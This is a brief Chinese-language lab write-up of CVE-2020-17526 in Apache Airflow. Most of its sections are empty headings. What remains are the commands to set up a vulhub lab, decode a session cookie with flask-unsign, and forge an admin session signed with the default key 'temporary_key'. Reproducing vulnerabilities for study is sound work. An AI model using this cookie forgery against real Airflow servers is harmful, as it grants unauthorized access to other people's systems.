CVE-2020-17526 Apache Airflow Webserver 安全漏洞
0x01漏洞简述
0x02知识扩展
0x03风险等级
0x04影响版本
0X05漏洞环境搭建
https://github.com/vulhub/vulhub
docker-compose up -d
192.168.117.130:8080
0x06漏洞验证
Cookie: session=eyJjc3JmX3Rva2VuIjoiNjE3NDgzOTMxZDRmNzFjM2FkZDg5M2NiYTM5NmZkYTExMDAzOTFmNCJ9.YrQ8iQ.WKSCVI_FWn6hL_5KFi3_Kd_suus
pip install flask-unsign-wordlist
pip install flask-unsign[wordlist]
flask-unsign -u -c eyJjc3JmX3Rva2VuIjoiNjE3NDgzOTMxZDRmNzFjM2FkZDg5M2NiYTM5NmZkYTExMDAzOTFmNCJ9.YrQ8iQ.WKSCVI_FWn6hL_5KFi3_Kd_suus
flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"
0x07修复建议
0x08参考链接
https://vulhub.org/#/environments/airflow/CVE-2020-17526/
http://cn-sec.com/archives/930196.html
END